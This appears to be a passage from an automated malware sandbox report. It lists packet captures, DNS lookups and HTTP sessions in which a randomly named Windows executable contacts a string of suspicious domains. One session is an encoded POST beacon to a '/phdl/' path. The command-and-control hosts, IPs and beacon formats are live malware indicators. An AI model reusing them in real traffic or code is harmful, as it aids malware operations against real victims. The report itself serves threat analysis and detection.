                                Sep 23, 2024 14:40:02.265130997 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265156031 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265162945 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265245914 CEST4975280192.168.2.7154.198.53.36
                                Sep 23, 2024 14:40:02.265726089 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265733957 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265742064 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265758991 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265764952 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265772104 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265774965 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:02.265872002 CEST4975280192.168.2.7154.198.53.36
                                Sep 23, 2024 14:40:02.265909910 CEST4975280192.168.2.7154.198.53.36
                                Sep 23, 2024 14:40:02.270428896 CEST4975280192.168.2.7154.198.53.36
                                Sep 23, 2024 14:40:02.275583029 CEST8049752154.198.53.36192.168.2.7
                                Sep 23, 2024 14:40:07.479880095 CEST4975380192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:07.484860897 CEST8049753154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:07.484961987 CEST4975380192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:07.496037960 CEST4975380192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:07.500988960 CEST8049753154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:08.418097019 CEST8049753154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:08.418113947 CEST8049753154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:08.418180943 CEST4975380192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:08.418184042 CEST8049753154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:08.418236017 CEST4975380192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:08.998541117 CEST4975380192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:10.017936945 CEST4975480192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:10.022933006 CEST8049754154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:10.023081064 CEST4975480192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:10.033812046 CEST4975480192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:10.038752079 CEST8049754154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:11.121341944 CEST8049754154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:11.121361971 CEST8049754154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:11.121372938 CEST8049754154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:11.121376991 CEST8049754154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:11.121459961 CEST4975480192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:11.121522903 CEST4975480192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:11.546557903 CEST4975480192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:12.564524889 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:12.569770098 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:12.570055008 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:12.581899881 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:12.586868048 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:12.587095022 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.093213081 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.269282103 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.269383907 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.269391060 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.269395113 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.269426107 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.269426107 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.269474983 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.269474983 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.269721031 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.269768953 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.269926071 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.269993067 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:14.272682905 CEST8049755154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:14.272823095 CEST4975580192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:15.111263990 CEST4975680192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:15.390953064 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:15.391079903 CEST4975680192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:15.398166895 CEST4975680192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:15.403029919 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.345779896 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.345798016 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.345805883 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.346045017 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.346060038 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.346067905 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:16.346281052 CEST4975680192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:16.371803045 CEST4975680192.168.2.7154.38.114.205
                                Sep 23, 2024 14:40:16.376733065 CEST8049756154.38.114.205192.168.2.7
                                Sep 23, 2024 14:40:21.459896088 CEST4975780192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:21.465099096 CEST804975784.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:21.465197086 CEST4975780192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:21.475891113 CEST4975780192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:21.481765032 CEST804975784.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:21.927069902 CEST804975784.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:21.927956104 CEST4975780192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:22.982953072 CEST4975780192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:22.988028049 CEST804975784.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:24.003887892 CEST4975880192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:24.009859085 CEST804975884.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:24.010153055 CEST4975880192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:24.023880005 CEST4975880192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:24.029006004 CEST804975884.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:24.493046999 CEST804975884.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:24.493136883 CEST4975880192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:25.531883001 CEST4975880192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:25.537064075 CEST804975884.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:26.548554897 CEST4975980192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:26.555795908 CEST804975984.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:26.555990934 CEST4975980192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:26.567243099 CEST4975980192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:26.572760105 CEST804975984.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:26.572784901 CEST804975984.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:27.052658081 CEST804975984.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:27.052809000 CEST4975980192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:29.436116934 CEST4975980192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:29.441133022 CEST804975984.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.454631090 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.460055113 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.460206032 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.467418909 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.474450111 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.936996937 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937010050 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937016964 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937074900 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937082052 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937088013 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937100887 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937108040 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937112093 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.937201977 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.937263966 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.937304974 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937310934 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937319040 CEST804976084.32.84.32192.168.2.7
                                Sep 23, 2024 14:40:30.937401056 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.941978931 CEST4976080192.168.2.784.32.84.32
                                Sep 23, 2024 14:40:30.946866989 CEST804976084.32.84.32192.168.2.7

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 23, 2024 14:36:56.641244888 CEST6008053192.168.2.71.1.1.1
                                Sep 23, 2024 14:36:56.728621006 CEST53600801.1.1.1192.168.2.7
                                Sep 23, 2024 14:37:12.470391989 CEST6473153192.168.2.71.1.1.1
                                Sep 23, 2024 14:37:12.918181896 CEST53647311.1.1.1192.168.2.7
                                Sep 23, 2024 14:37:26.783338070 CEST6287653192.168.2.71.1.1.1
                                Sep 23, 2024 14:37:27.218805075 CEST53628761.1.1.1192.168.2.7
                                Sep 23, 2024 14:37:41.689815044 CEST5051353192.168.2.71.1.1.1
                                Sep 23, 2024 14:37:41.703398943 CEST53505131.1.1.1192.168.2.7
                                Sep 23, 2024 14:37:56.104762077 CEST6334553192.168.2.71.1.1.1
                                Sep 23, 2024 14:37:56.166085005 CEST53633451.1.1.1192.168.2.7
                                Sep 23, 2024 14:38:09.675859928 CEST5896853192.168.2.71.1.1.1
                                Sep 23, 2024 14:38:09.966543913 CEST53589681.1.1.1192.168.2.7
                                Sep 23, 2024 14:38:23.298850060 CEST5067853192.168.2.71.1.1.1
                                Sep 23, 2024 14:38:23.756104946 CEST53506781.1.1.1192.168.2.7
                                Sep 23, 2024 14:38:37.705790997 CEST6273553192.168.2.71.1.1.1
                                Sep 23, 2024 14:38:37.821614027 CEST53627351.1.1.1192.168.2.7
                                Sep 23, 2024 14:38:51.738074064 CEST5216553192.168.2.71.1.1.1
                                Sep 23, 2024 14:38:51.916425943 CEST53521651.1.1.1192.168.2.7
                                Sep 23, 2024 14:39:05.376945972 CEST5694353192.168.2.71.1.1.1
                                Sep 23, 2024 14:39:05.393835068 CEST53569431.1.1.1192.168.2.7
                                Sep 23, 2024 14:39:13.455873966 CEST5157953192.168.2.71.1.1.1
                                Sep 23, 2024 14:39:13.524205923 CEST53515791.1.1.1192.168.2.7
                                Sep 23, 2024 14:39:26.627523899 CEST5741753192.168.2.71.1.1.1
                                Sep 23, 2024 14:39:26.677639008 CEST53574171.1.1.1192.168.2.7
                                Sep 23, 2024 14:39:40.096287012 CEST5155953192.168.2.71.1.1.1
                                Sep 23, 2024 14:39:40.122814894 CEST53515591.1.1.1192.168.2.7
                                Sep 23, 2024 14:39:53.408479929 CEST5742153192.168.2.71.1.1.1
                                Sep 23, 2024 14:39:53.610970974 CEST53574211.1.1.1192.168.2.7
                                Sep 23, 2024 14:40:07.284688950 CEST5785653192.168.2.71.1.1.1
                                Sep 23, 2024 14:40:07.474169970 CEST53578561.1.1.1192.168.2.7
                                Sep 23, 2024 14:40:21.379895926 CEST6043553192.168.2.71.1.1.1
                                Sep 23, 2024 14:40:21.455171108 CEST53604351.1.1.1192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Sep 23, 2024 14:36:56.641244888 CEST192.168.2.71.1.1.10x5ef5Standard query (0)www.kovallo.cloudA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:12.470391989 CEST192.168.2.71.1.1.10x93c0Standard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:26.783338070 CEST192.168.2.71.1.1.10x80a0Standard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:41.689815044 CEST192.168.2.71.1.1.10xc9beStandard query (0)www.rtpngk.xyzA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:56.104762077 CEST192.168.2.71.1.1.10xb338Standard query (0)www.bluegirls.blogA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:09.675859928 CEST192.168.2.71.1.1.10x50e9Standard query (0)www.mistsui.topA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:23.298850060 CEST192.168.2.71.1.1.10x10e0Standard query (0)www.solisbysobha.netA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:37.705790997 CEST192.168.2.71.1.1.10xd17eStandard query (0)www.sppsuperplast.onlineA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:51.738074064 CEST192.168.2.71.1.1.10x9badStandard query (0)www.deefbank.netA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:05.376945972 CEST192.168.2.71.1.1.10xbf6cStandard query (0)www.shopdj00.xyzA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:13.455873966 CEST192.168.2.71.1.1.10xe5f1Standard query (0)www.donante-de-ovulos.bizA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:26.627523899 CEST192.168.2.71.1.1.10xd855Standard query (0)www.chalet-tofane.netA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:40.096287012 CEST192.168.2.71.1.1.10x503dStandard query (0)www.greekhause.orgA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.408479929 CEST192.168.2.71.1.1.10x47deStandard query (0)www.085bet.xyzA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:40:07.284688950 CEST192.168.2.71.1.1.10x25f3Standard query (0)www.2024tengxun361.buzzA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:40:21.379895926 CEST192.168.2.71.1.1.10x6a5fStandard query (0)www.bodegamayorista.onlineA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Sep 23, 2024 14:36:56.728621006 CEST1.1.1.1192.168.2.70x5ef5No error (0)www.kovallo.cloudkovallo.cloudCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:36:56.728621006 CEST1.1.1.1192.168.2.70x5ef5No error (0)kovallo.cloud81.2.196.19A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:12.918181896 CEST1.1.1.1192.168.2.70x93c0No error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:37:12.918181896 CEST1.1.1.1192.168.2.70x93c0No error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:27.218805075 CEST1.1.1.1192.168.2.70x80a0No error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:37:27.218805075 CEST1.1.1.1192.168.2.70x80a0No error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:41.703398943 CEST1.1.1.1192.168.2.70xc9beNo error (0)www.rtpngk.xyz188.114.97.3A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:41.703398943 CEST1.1.1.1192.168.2.70xc9beNo error (0)www.rtpngk.xyz188.114.96.3A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:37:56.166085005 CEST1.1.1.1192.168.2.70xb338No error (0)www.bluegirls.blogbluegirls.blogCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:37:56.166085005 CEST1.1.1.1192.168.2.70xb338No error (0)bluegirls.blog195.110.124.133A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:09.966543913 CEST1.1.1.1192.168.2.70x50e9No error (0)www.mistsui.top162.0.238.246A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:23.756104946 CEST1.1.1.1192.168.2.70x10e0No error (0)www.solisbysobha.net198.50.252.64A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:37.821614027 CEST1.1.1.1192.168.2.70xd17eNo error (0)www.sppsuperplast.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:38:37.821614027 CEST1.1.1.1192.168.2.70xd17eNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:38:37.821614027 CEST1.1.1.1192.168.2.70xd17eNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:38:51.916425943 CEST1.1.1.1192.168.2.70x9badNo error (0)www.deefbank.netghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:38:51.916425943 CEST1.1.1.1192.168.2.70x9badNo error (0)ghs.googlehosted.com142.250.186.51A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:05.393835068 CEST1.1.1.1192.168.2.70xbf6cServer failure (2)www.shopdj00.xyznonenoneA (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:13.524205923 CEST1.1.1.1192.168.2.70xe5f1No error (0)www.donante-de-ovulos.biz199.59.243.227A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:26.677639008 CEST1.1.1.1192.168.2.70xd855No error (0)www.chalet-tofane.netchalet-tofane.netCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:39:26.677639008 CEST1.1.1.1192.168.2.70xd855No error (0)chalet-tofane.net62.149.128.40A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:40.122814894 CEST1.1.1.1192.168.2.70x503dNo error (0)www.greekhause.orggreekhause.orgCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:39:40.122814894 CEST1.1.1.1192.168.2.70x503dNo error (0)greekhause.org3.33.130.190A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:40.122814894 CEST1.1.1.1192.168.2.70x503dNo error (0)greekhause.org15.197.148.33A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)www.085bet.xyzp-kc352zjcdn.abcty1.comCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)p-kc352zjcdn.abcty1.comef6f8e2a.abcty2.comCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)ef6f8e2a.abcty2.comcluster580fc23f.abcty2.comCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com154.198.53.36A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com27.0.235.36A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com27.0.235.49A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com185.121.169.26A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com45.194.36.61A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com103.244.226.202A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com27.0.235.160A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com154.198.53.47A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com45.194.36.12A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:39:53.610970974 CEST1.1.1.1192.168.2.70x47deNo error (0)cluster580fc23f.abcty2.com27.0.235.55A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:40:07.474169970 CEST1.1.1.1192.168.2.70x25f3No error (0)www.2024tengxun361.buzz154.38.114.205A (IP address)IN (0x0001)false
                                Sep 23, 2024 14:40:21.455171108 CEST1.1.1.1192.168.2.70x6a5fNo error (0)www.bodegamayorista.onlinebodegamayorista.onlineCNAME (Canonical name)IN (0x0001)false
                                Sep 23, 2024 14:40:21.455171108 CEST1.1.1.1192.168.2.70x6a5fNo error (0)bodegamayorista.online84.32.84.32A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.kovallo.cloud
                                • www.tempatmudisini01.click
                                • www.zz82x.top
                                • www.rtpngk.xyz
                                • www.bluegirls.blog
                                • www.mistsui.top
                                • www.solisbysobha.net
                                • www.sppsuperplast.online
                                • www.deefbank.net
                                • www.donante-de-ovulos.biz
                                • www.chalet-tofane.net
                                • www.greekhause.org
                                • www.085bet.xyz
                                • www.2024tengxun361.buzz
                                • www.bodegamayorista.online

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.74970381.2.196.19803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:36:56.753988028 CEST478OUTGET /ye3m/?mtJD_=fvdlJ2L&76=BO45+0u1emCE8p481TGhlGJRfjijEniKMfSBNkuCyA4PSNUX9OtmTTSsRjXRpS6xcva9ZoEmbKYu7sV13UJQ2VHV0V6wg3gLfDQvPBhIAhk7jspRbUMiRCt8g415t+g4yzmjfyP2O5kn HTTP/1.1
                                Host: www.kovallo.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:36:57.419692039 CEST691INHTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:36:57 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.749704103.21.221.4803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:12.936741114 CEST770OUTPOST /phdl/ HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.tempatmudisini01.click
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.tempatmudisini01.click/phdl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 5a 62 4b 45 36 59 49 32 62 46 4b 38 55 44 69 68 53 69 38 38 37 4b 6e 71 63 59 2f 77 63 36 78 67 73 48 38 36 6e 6e 67 77 30 77 6e 30 77 6c 7a 58 6d 32 39 44 71 42 42 55 75 66 57 43 78 75 6e 43 2f 34 6f 73 45 4c 4f 57 67 64 51 53 34 47 59 65 79 67 30 58 49 6a 41 4c 34 71 72 6f 67 75 4b 52 50 55 4c 64 73 57 6b 66 41 38 36 30 72 59 32 54 73 43 71 67 2b 65 32 36 53 61 62 4a 43 2f 6e 52 45 4a 32 39 32 33 67 30 76 6a 55 37 68 59 6e 6a 50 30 33 59 56 6a 6d 2b 63 71 42 38 6f 53 48 62 68 70 30 77 4d 72 55 6b 79 68 77 4f 49 58 74 46 64 75 43 6e 2f 6d 79 78 38 71 68 7a 64 67 69 66 50 55 4e 4e 41 67 3d 3d
                                Data Ascii: 76=cY0tPtnQJ+/2ZbKE6YI2bFK8UDihSi887KnqcY/wc6xgsH86nngw0wn0wlzXm29DqBBUufWCxunC/4osELOWgdQS4GYeyg0XIjAL4qroguKRPULdsWkfA860rY2TsCqg+e26SabJC/nREJ2923g0vjU7hYnjP03YVjm+cqB8oSHbhp0wMrUkyhwOIXtFduCn/myx8qhzdgifPUNNAg==
                                Sep 23, 2024 14:37:14.218002081 CEST1236INHTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                x-litespeed-tag: 894_HTTP.404
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                content-type: text/html; charset=UTF-8
                                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache-control: no-cache
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                transfer-encoding: chunked
                                content-encoding: br
                                vary: Accept-Encoding
                                date: Mon, 23 Sep 2024 12:37:14 GMT
                                server: LiteSpeed
